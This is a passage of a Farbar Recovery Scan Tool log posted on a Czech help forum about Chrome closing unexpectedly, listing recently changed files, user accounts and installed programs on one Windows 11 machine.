2022-11-05 02:09 - 2022-11-05 02:09 - 000003894 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003858 _____ C:\WINDOWS\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-11-05 02:09 - 000003654 _____ C:\WINDOWS\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2022-11-05 02:09 - 2022-07-14 00:32 - 000060112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2022-11-05 02:05 - 2022-11-05 02:05 - 000002299 _____ C:\Users\Woytman\Desktop\DeepL.lnk
2022-11-05 01:28 - 2022-11-05 01:47 - 000000000 ____D C:\Program Files (x86)\SeoTools for Excel
2022-11-04 23:30 - 2022-11-04 23:30 - 000000067 _____ C:\Users\Woytman\Desktop\stavba.txt
2022-11-04 23:08 - 2022-11-04 23:08 - 000012214 _____ C:\Users\Woytman\Documents\zaklady.xlsm
2022-11-03 00:36 - 2022-11-03 00:36 - 000003936 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2022-11-02 21:50 - 2022-11-02 21:50 - 000000000 ____D C:\Users\Woytman\AppData\Local\ManagerV2
2022-11-02 21:40 - 2022-11-02 21:40 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
2022-11-02 21:39 - 2022-11-02 21:48 - 000000000 ____D C:\Program Files\Rockstar Games
2022-10-30 22:22 - 2022-11-05 16:30 - 000002258 _____ C:\WINDOWS\system32\Tasks\CCleanerSkipUAC - Woytman
2022-10-24 19:20 - 2022-10-24 19:20 - 000037624 _____ C:\Users\Woytman\Documents\ukázka.veg
2022-10-24 19:16 - 2022-10-24 19:16 - 299622757 _____ C:\Users\Woytman\Documents\Untitled4.mp4
2022-10-23 15:20 - 2022-10-23 15:20 - 000001178 _____ C:\Users\Woytman\Desktop\TS4_x64.exe.lnk
2022-10-22 18:04 - 2022-10-22 18:04 - 000000000 ____D C:\Users\Woytman\AppData\Local\GameAnalytics
2022-10-22 18:03 - 2022-10-22 18:03 - 000001711 _____ C:\Users\Public\Desktop\LEGO® Bricktales.lnk
2022-10-22 18:03 - 2022-10-22 18:03 - 000000000 ____D C:\Users\Woytman\AppData\LocalLow\ClockStone Software GmbH
2022-10-22 18:03 - 2022-10-22 18:03 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LEGO® Bricktales [GOG.com]
2022-10-22 18:01 - 2022-10-12 16:31 - 000000000 ____D C:\Users\Woytman\Desktop\LEGO.Bricktales-GOG
2022-10-22 08:21 - 2022-10-22 08:21 - 000011262 _____ C:\Users\Woytman\Documents\Hesla Chrome.csv
2022-10-19 16:56 - 2022-10-19 16:56 - 000002946 _____ C:\Users\Woytman\Documents\Module3.bas
2022-10-19 16:56 - 2022-10-19 16:56 - 000000263 _____ C:\Users\Woytman\Documents\Module2.bas
2022-10-19 16:56 - 2022-10-19 16:56 - 000000232 _____ C:\Users\Woytman\Documents\Module1.bas
2022-10-17 22:39 - 2022-10-17 23:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PC Building Simulator [GOG.com]
2022-10-17 22:32 - 2022-10-17 22:32 - 000001224 _____ C:\Users\Public\Desktop\GOG GALAXY.lnk
2022-10-17 22:31 - 2022-10-17 22:32 - 000000000 ____D C:\Program Files (x86)\GOG Galaxy
2022-10-17 21:06 - 2022-11-07 18:40 - 000000000 ____D C:\Users\Woytman\Desktop\FBI - Secret Files
2022-10-16 10:26 - 2022-11-03 00:38 - 000003704 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA{0F4697CB-846A-446D-9512-E26D98D15268}
2022-10-16 10:26 - 2022-11-03 00:38 - 000003480 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore{034ABE64-6EBF-4C3C-8A70-5786FAF890B2}
2022-10-15 22:33 - 2022-10-15 22:34 - 000000000 ____D C:\Users\Woytman\AppData\Local\unali-40699656
2022-10-15 22:33 - 2022-10-15 22:34 - 000000000 ____D C:\Users\Woytman\AppData\Local\unali-40699531
2022-10-15 22:09 - 2022-10-15 22:09 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2022-10-15 22:01 - 2022-10-15 22:01 - 000000198 _____ C:\WINDOWS\system32\7CB70479-6581-4B43-912B-52A357E12051.ps1
2022-10-15 21:55 - 2022-10-15 22:23 - 000000000 ____D C:\Users\Public\Documents\RegRunInfo
2022-10-15 21:02 - 2022-10-15 21:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2022-10-15 21:02 - 2022-10-15 21:02 - 000000000 ____D C:\Program Files\CPUID
2022-10-15 20:05 - 2022-10-22 18:02 - 000000000 ____D C:\Games
2022-10-15 18:08 - 2022-10-15 18:08 - 000000000 ____D C:\Users\Woytman\AppData\Local\GOG.com
2022-10-15 02:03 - 2022-10-15 02:03 - 000032552 _____ C:\Users\Woytman\Documents\Untitled.veg
2022-10-15 01:51 - 2022-10-15 01:51 - 272056361 _____ C:\Users\Woytman\Documents\Untitled.mp4
2022-10-15 00:57 - 2022-10-15 00:57 - 000011200 _____ C:\Users\Woytman\Documents\Clean Logo Reveal Intro Template.mp4.sfk
2022-10-15 00:56 - 2022-10-15 00:56 - 008206657 _____ C:\Users\Woytman\Documents\Clean Logo Reveal Intro Template.mp4
2022-10-15 00:52 - 2022-10-15 00:52 - 000021600 _____ C:\Users\Woytman\Documents\Untitled.veg.bak
2022-10-15 00:33 - 2022-10-15 00:33 - 000000000 ____D C:\Users\Woytman\AppData\Local\MAGIX
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\VEGAS Pro
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\MAGIX
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\Users\Woytman\AppData\Local\Plugin.ofx360Stabilizer
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\ProgramData\VEGAS Pro
2022-10-15 00:32 - 2022-10-15 00:32 - 000000000 ____D C:\ProgramData\Magix
2022-10-15 00:10 - 2022-10-24 18:34 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\obs-studio
2022-10-12 18:49 - 2022-10-12 18:49 - 000000000 ____D C:\Users\Woytman\AppData\LocalLow\Epic Games Publishing
2022-10-11 20:00 - 2022-10-11 20:00 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Locktime
2022-10-11 20:00 - 2022-10-11 20:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetLimiter 4
2022-10-11 20:00 - 2022-10-11 20:00 - 000000000 ____D C:\ProgramData\Locktime
2022-10-11 20:00 - 2022-10-11 20:00 - 000000000 ____D C:\Program Files\Locktime Software
2022-10-11 19:48 - 2022-10-12 18:12 - 000000000 ____D C:\Program Files\Epic Games
2022-10-11 19:42 - 2022-10-16 21:08 - 000000000 ____D C:\Users\Woytman\AppData\Local\EpicGamesLauncher
2022-10-11 19:42 - 2022-10-12 18:37 - 000000000 ____D C:\Users\Woytman\AppData\Local\Epic Games
2022-10-11 19:42 - 2022-10-11 19:42 - 000000000 ____D C:\Users\Woytman\AppData\Local\UnrealEngineLauncher
2022-10-11 19:41 - 2022-10-11 19:44 - 000000000 ____D C:\ProgramData\Epic
2022-10-11 19:41 - 2022-10-11 19:41 - 000001334 _____ C:\Users\Woytman\Desktop\Epic Games Launcher.lnk
2022-10-11 19:41 - 2022-10-11 19:41 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2022-10-11 19:41 - 2022-10-11 19:41 - 000000000 ____D C:\Program Files (x86)\Epic Games
2022-10-11 18:57 - 2022-10-11 18:57 - 000015501 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-10-11 18:56 - 2022-10-11 18:56 - 000077824 _____ C:\WINDOWS\system32\runexehelper.exe
2022-10-11 18:53 - 2022-10-11 18:53 - 000000000 ___HD C:\$WinREAgent
2022-10-10 23:30 - 2022-10-10 23:30 - 000000188 _____ C:\Users\Woytman\Documents\nový 2.txt
2022-10-08 16:01 - 2022-10-08 16:01 - 000000000 ____D C:\Users\Woytman\Documents\Electronic Arts
2022-10-08 16:00 - 2022-10-08 16:00 - 000000000 ____D C:\Users\Woytman\AppData\Local\anadius

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2022-11-07 22:44 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\SystemTemp
2022-11-07 22:43 - 2022-04-03 23:32 - 000000000 ____D C:\ProgramData\Adguard
2022-11-07 22:34 - 2021-10-23 22:58 - 000000000 ____D C:\Users\Woytman
2022-11-07 22:34 - 2020-09-26 22:25 - 000002452 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-11-07 21:54 - 2022-04-28 08:22 - 000000000 ____D C:\Users\Woytman\AppData\Local\CrashDumps
2022-11-07 21:42 - 2020-09-26 22:20 - 000000000 ____D C:\Users\Woytman\AppData\Local\Packages
2022-11-07 20:34 - 2021-06-05 13:10 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-11-07 20:11 - 2021-10-23 22:57 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-11-07 19:20 - 2022-01-11 21:46 - 000000128 _____ C:\Users\Woytman\AppData\Roaming\winscp.rnd
2022-11-07 18:34 - 2022-07-01 21:13 - 000000132 _____ C:\Users\Woytman\AppData\Roaming\Adobe PNG Format CS6 Prefs
2022-11-07 18:20 - 2020-12-28 23:03 - 000000000 ____D C:\Users\Woytman\AppData\Local\Google
2022-11-07 16:40 - 2022-01-12 22:29 - 000000000 ____D C:\ProgramData\NVIDIA
2022-11-07 16:40 - 2020-09-27 08:30 - 000000000 ____D C:\Program Files\CCleaner
2022-11-06 19:32 - 2021-10-23 23:11 - 001714894 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-11-06 19:32 - 2021-06-05 18:20 - 000714186 _____ C:\WINDOWS\system32\perfh005.dat
2022-11-06 19:32 - 2021-06-05 18:20 - 000146956 _____ C:\WINDOWS\system32\perfc005.dat
2022-11-06 19:32 - 2021-06-05 13:09 - 000000000 ____D C:\WINDOWS\INF
2022-11-06 19:27 - 2022-04-28 15:59 - 000000000 ____D C:\Intel
2022-11-06 19:27 - 2021-10-23 23:06 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-11-06 19:27 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\ServiceState
2022-11-06 19:27 - 2020-06-12 23:13 - 000012288 ___SH C:\DumpStack.log.tmp
2022-11-06 19:27 - 2019-11-20 18:19 - 000000000 __SHD C:\Users\Woytman\IntelGraphicsProfiles
2022-11-06 17:17 - 2021-06-05 13:01 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2022-11-05 18:33 - 2021-06-05 13:01 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-11-05 16:41 - 2021-06-05 13:10 - 000000000 ___HD C:\Program Files\WindowsApps
2022-11-05 16:41 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-11-05 16:36 - 2022-07-28 23:23 - 000002715 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-11-05 16:32 - 2020-09-26 22:25 - 000000000 ____D C:\Program Files (x86)\Google
2022-11-05 16:29 - 2021-12-29 23:10 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikace Chrome
2022-11-05 02:38 - 2022-01-12 22:31 - 000000000 ____D C:\Users\Woytman\AppData\Local\NVIDIA
2022-11-05 02:11 - 2022-08-19 13:38 - 000003830 _____ C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DeepL.lnk
2022-11-05 02:09 - 2022-01-12 22:30 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2022-11-05 02:09 - 2022-01-12 22:29 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2022-11-05 02:09 - 2022-01-12 22:25 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2022-11-05 02:07 - 2020-09-26 22:20 - 000000000 ____D C:\ProgramData\Packages
2022-11-05 00:39 - 2022-08-22 22:46 - 000000000 ____D C:\Users\Woytman\AppData\Local\DeepL_SE
2022-11-03 02:37 - 2022-06-12 22:04 - 000000000 ____D C:\Program Files\Microsoft Office
2022-11-03 02:36 - 2021-12-25 11:56 - 000000000 ____D C:\Users\Woytman\AppData\Local\ElevatedDiagnostics
2022-11-03 01:31 - 2022-08-22 22:52 - 000000000 ____D C:\Users\Woytman\Downloads\dnSpy-net-win64
2022-11-03 00:38 - 2022-03-21 00:19 - 000003538 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}
2022-11-03 00:37 - 2022-08-21 20:16 - 000000000 ____D C:\temp
2022-11-02 22:00 - 2022-06-10 17:03 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\qBittorrent
2022-11-02 21:50 - 2022-08-19 20:56 - 000000000 ____D C:\Users\Woytman\Downloads\CZ_Manager_2.3.3.9
2022-11-02 21:40 - 2020-09-26 22:31 - 000000000 ____D C:\ProgramData\Rockstar Games
2022-11-02 21:39 - 2021-12-01 16:59 - 000000000 ____D C:\Users\Woytman\AppData\Local\Rockstar Games
2022-11-02 21:39 - 2021-01-16 09:01 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rockstar Games
2022-11-01 06:01 - 2020-09-26 22:08 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2022-10-30 22:22 - 2022-01-30 03:32 - 000000000 ____D C:\Program Files (x86)\Steam
2022-10-30 20:34 - 2022-08-21 20:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer
2022-10-30 20:33 - 2022-08-21 20:14 - 000000000 ____D C:\Program Files (x86)\Razer Chroma SDK
2022-10-27 18:56 - 2022-05-29 09:05 - 000000000 ____D C:\Users\Woytman\AppData\Local\D3DSCache
2022-10-24 19:20 - 2020-10-05 21:12 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\vlc
2022-10-24 18:38 - 2022-08-21 20:16 - 000000000 ____D C:\Users\Woytman\AppData\Local\Razer
2022-10-24 18:38 - 2022-08-21 20:11 - 000000000 ____D C:\Program Files (x86)\Razer
2022-10-22 16:19 - 2020-11-21 11:20 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2022-10-19 19:47 - 2020-09-26 22:32 - 000000884 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++.lnk
2022-10-19 19:47 - 2020-09-26 22:32 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Notepad++
2022-10-18 15:54 - 2021-10-23 22:57 - 002545728 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-10-17 22:32 - 2021-10-28 17:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOG.com
2022-10-17 22:31 - 2021-10-28 17:19 - 000000000 ____D C:\ProgramData\GOG.com
2022-10-17 07:25 - 2022-06-10 22:44 - 002890296 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2022-10-17 07:25 - 2022-06-10 22:44 - 002224696 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2022-10-17 07:25 - 2022-06-10 22:44 - 001297464 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvRtmpStreamer64.dll
2022-10-16 19:33 - 2022-06-03 22:09 - 000000000 ____D C:\Users\Woytman\AppData\LocalLow\The Irregular Corp
2022-10-15 22:36 - 2022-08-25 22:13 - 000000000 ____D C:\Program Files (x86)\EaseUS
2022-10-15 22:34 - 2022-01-30 03:49 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-10-15 22:34 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\registration
2022-10-15 00:32 - 2021-09-06 23:06 - 000000000 ____D C:\ProgramData\VEGAS
2022-10-15 00:32 - 2021-05-24 11:58 - 000000000 ____D C:\Users\Woytman\AppData\Roaming\VEGAS
2022-10-15 00:10 - 2021-05-24 11:34 - 000000000 ____D C:\ProgramData\obs-studio-hook
2022-10-15 00:10 - 2021-05-24 11:34 - 000000000 ____D C:\Program Files\obs-studio
2022-10-15 00:10 - 2021-01-25 23:24 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2022-10-12 16:08 - 2021-03-10 06:32 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-10-12 16:06 - 2020-10-02 18:54 - 147398024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-10-12 16:05 - 2022-07-30 19:40 - 000000000 ____D C:\Program Files\dotnet
2022-10-12 16:05 - 2021-02-19 12:35 - 000000000 ____D C:\ProgramData\Package Cache
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\SystemResources
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\system32\PerceptionSimulation
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\system32\oobe
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\system32\Dism
2022-10-11 19:00 - 2021-06-05 13:10 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-10-11 18:56 - 2021-10-23 22:57 - 003106304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2022-10-11 18:46 - 2021-10-23 23:42 - 000000000 ____D C:\Program Files\MSBuild
2022-10-11 18:46 - 2021-10-23 23:42 - 000000000 ____D C:\Program Files (x86)\MSBuild

==================== Files in the root of some directories ========

2021-12-13 16:12 - 2021-12-13 16:12 - 000000257 _____ () C:\ProgramData\fontcacheev1.dat
2022-07-01 21:13 - 2022-11-07 18:34 - 000000132 _____ () C:\Users\Woytman\AppData\Roaming\Adobe PNG Format CS6 Prefs
2022-08-04 21:38 - 2022-08-04 21:40 - 000000195 _____ () C:\Users\Woytman\AppData\Roaming\nuvotonISP.lua
2022-01-11 21:46 - 2022-11-07 19:20 - 000000128 _____ () C:\Users\Woytman\AppData\Roaming\winscp.rnd

==================== FLock ==============================

2022-11-05 02:36 C:\Users\Woytman\Application Data
2022-07-01 20:32 C:\Users\Woytman\AppData\Local\Application Data

==================== FCheck ================================

(If an entry is included in the fixlist, the file/folder will be moved.)

FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2021-04-03] <==== ATTENTION (zero byte File/Folder)

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

autoprd
Level 4.5
Posts: 1715
Registered: February 09
Location: ▼▲☺U Pc ☺▼▲
Gender: Male
Status: Offline

Re: Chrome keeps closing on its own

Post by autoprd » 07 Nov 2022 23:31

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06-11-2022
Ran by Woytman (07-11-2022 22:45:06)
Running from C:\Users\Woytman\Desktop
Microsoft Windows 11 Home Version 21H2 22000.1098 (X64) (2021-10-23 22:06:37)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================


(If an entry is included in the fixlist, it will be removed.)

Administrator (S-1-5-21-3110588475-2115266248-3539613761-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3110588475-2115266248-3539613761-503 - Limited - Disabled)
Guest (S-1-5-21-3110588475-2115266248-3539613761-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-3110588475-2115266248-3539613761-504 - Limited - Disabled)
Woytman (S-1-5-21-3110588475-2115266248-3539613761-1001 - Administrator - Enabled) => C:\Users\Woytman

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 22.00 (x64) (HKLM\...\7-Zip) (Version: 22.00 - Igor Pavlov)
AdGuard (HKLM-x32\...\{685F6AB3-7C61-42D1-AE5B-3864E48D1035}) (Version: 7.9.3869.0 - Adguard Software Ltd)
AdGuard (HKLM-x32\...\{f6465dc4-c684-41fa-ab39-8d05c75904cd}) (Version: 7.8.3779.0 - Adguard Software Ltd)
Adobe Acrobat Reader DC - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AC0F074E4100}) (Version: 21.001.20138 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\{58975D61-1C4B-4385-ADB0-4A8E3EC250A4}) (Version: 33.1.1.743 - HARMAN International) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 33.1.1.743 - HARMAN International)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
AntiMicroX (HKLM\...\AntiMicroX) (Version: 3.2.1 - Humanity)
Aplikace Intel® PROSet/Wireless (HKLM-x32\...\{cc6edfa9-9806-4a53-9313-f8e2d11d69c4}) (Version: 20.120.0 - Intel Corporation)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
Balíček ovladače systému Windows - Google, Inc. (WinUSB) AndroidUsbDeviceClass (08/28/2014 11.0.0000.00000) (HKLM\...\092555911492C6959D2596D612F52DCA71881CA2) (Version: 08/28/2014 11.0.0000.00000 - Google, Inc.)
Balíček ovladače systému Windows - Microsoft PS VR Control (Interface 5) (02/22/2013 6.1.7600.16385) (HKLM\...\7664041C62AE68D4B2EB4627167336BB2D4D7C46) (Version: 02/22/2013 6.1.7600.16385 - Microsoft)
Balíček ovladače systému Windows - PSVR V1 Monitor (07/26/2019 1.0.0000.2) (HKLM\...\70A8FA744F6781C50310DB1812580CDBB1E1C143) (Version: 07/26/2019 1.0.0000.2 - PSVR V1)
Balíček ovladače systému Windows - PSVR V2 Monitor (07/26/2019 1.0.0000.2) (HKLM\...\6548DFCB223CBDF91B9800993A6192BA9DC6222C) (Version: 07/26/2019 1.0.0000.2 - PSVR V2)
Balíček ovladače systému Windows - Ross-Tech HIDClass (01/05/2014 6.3.0.3) (HKLM\...\3A9B09BBD4F12A76FBBD3A428729660930BA5F13) (Version: 01/05/2014 6.3.0.3 - Ross-Tech)
Balíček ovladače systému Windows - Sony Monitor (01/01/2020 1.0.0.7) (HKLM\...\0D35615C8CCCCD642BD1C8558348D2B1BA24B67B) (Version: 01/01/2020 1.0.0.7 - Sony)
Balíček ovladače systému Windows - Sony Monitor (01/01/2020 1.0.0.7) (HKLM\...\32177D3FE2EEDA41511C41D6B21621C8E7131772) (Version: 01/01/2020 1.0.0.7 - Sony)
Balíček ovladače systému Windows - Sony Monitor (01/01/2020 1.0.0.7) (HKLM\...\A7330D958F3FA3C45688DF899FE2D5033F1F9FAA) (Version: 01/01/2020 1.0.0.7 - Sony)
Balíček ovladače systému Windows - Sony Monitor (01/01/2020 1.0.0.7) (HKLM\...\DBD2306B7DC331E1E3461932DDB4ECB2CB94C0A7) (Version: 01/01/2020 1.0.0.7 - Sony)
Balíček ovladače systému Windows - Sony Monitor (02/01/2019 1.0.0.5) (HKLM\...\688B5D24F096088E969299173087ACBEC571DB59) (Version: 02/01/2019 1.0.0.5 - Sony)
Battery Calibration (HKLM-x32\...\InstallShield_{634AC01E-49DB-4AD2-B87C-90D4DCC6AFA1}) (Version: 1.0.2001.2101 - Micro-Star International Co., Ltd.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 6.05 - Piriform)
CPUID HWMonitor 1.46 (HKLM\...\CPUID HWMonitor_is1) (Version: 1.46 - CPUID, Inc.)
DeepL (HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\DeepL) (Version: 4.0.6052 - DeepL SE)
DeepL (HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\https%3a##appdownload.deepl.com#windows#0install#deepl.xml) (Version: - )
Dragon Center (HKLM-x32\...\InstallShield_{C65B26BC-5A6F-4135-9678-55A877655471}) (Version: 2.6.2005.0601 - Micro-Star International Co., Ltd.)
Epic Games Launcher (HKLM-x32\...\{20235E2B-1E9F-473D-A215-B2467F1F06E3}) (Version: 1.3.51.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epic Online Services (HKLM-x32\...\{19695986-25CE-41AC-9C6F-54794653EDBA}) (Version: 2.0.36.0 - Epic Games, Inc.)
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 4.TTRS.2021 - Thrustmaster)
GOG GALAXY (HKLM-x32\...\{7258BA11-600C-430E-A759-27E2C691A335}_is1) (Version: - GOG.com)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 107.0.5304.88 - Google LLC)
Grand Theft Auto V (HKLM-x32\...\{5EFC6C07-6B87-43FC-9524-F9E967241741}) (Version: 1.0.2699.16 - Rockstar Games)
HxD Hex Editor 2.5 (HKLM\...\HxD_is1) (Version: 2.5 - Maël Hörz)
Cheat Engine 7.4 (HKLM\...\Cheat Engine_is1) (Version: - Cheat Engine)
Intel(R) Chipset Device Software (HKLM\...\{148D6ED8-24B8-443D-9C5B-5D6BF506671B}) (Version: 10.1.17903.8106 - Intel Corporation) Hidden
Intel® PROSet/Wireless WiFi Software (HKLM\...\{8F7809B3-BA0B-4190-8F42-A26155830655}) (Version: 20.120.0.2866 - Intel Corporation) Hidden
Java 8 Update 321 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180321F0}) (Version: 8.0.3210.7 - Oracle Corporation)
Java 8 Update 331 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180331F0}) (Version: 8.0.3310.9 - Oracle Corporation)
Java SE Development Kit 8 Update 321 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180321}) (Version: 8.0.3210.7 - Oracle Corporation)
JDownloader 2 (HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LEGO® Bricktales (HKLM-x32\...\1488738238_is1) (Version: 1.1_Master2 - GOG.com)
Lightshot-5.5.0.7 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.5.0.7 - Skillbrains)
Mem Reduct (HKLM\...\memreduct) (Version: 3.4 - Henry++)
Microsoft .NET Host - 6.0.10 (x64) (HKLM\...\{0222FFF1-57A3-48A6-9AD2-0D6B5D0172B3}) (Version: 48.43.48869 - Microsoft Corporation) Hidden
Microsoft .NET Host FX Resolver - 6.0.10 (x64) (HKLM\...\{A93C4E12-1BAB-4CFB-ADBC-9CE0B93176FF}) (Version: 48.43.48869 - Microsoft Corporation) Hidden
Microsoft .NET Runtime - 6.0.10 (x64) (HKLM\...\{A2A39CB9-677D-4299-8537-C00B99F3D4A4}) (Version: 48.43.48869 - Microsoft Corporation) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 107.0.1418.35 - Microsoft Corporation)
Microsoft Edge WebView2 Runtime (HKLM-x32\...\Microsoft EdgeWebView) (Version: 107.0.1418.35 - Microsoft Corporation)
Microsoft Excel 2019 - cs-cz (HKLM\...\Excel2019Retail - cs-cz) (Version: 16.0.15726.20174 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50918.0 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{6A2A8076-135F-4F55-BB02-DED67C8C6934}) (Version: 4.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
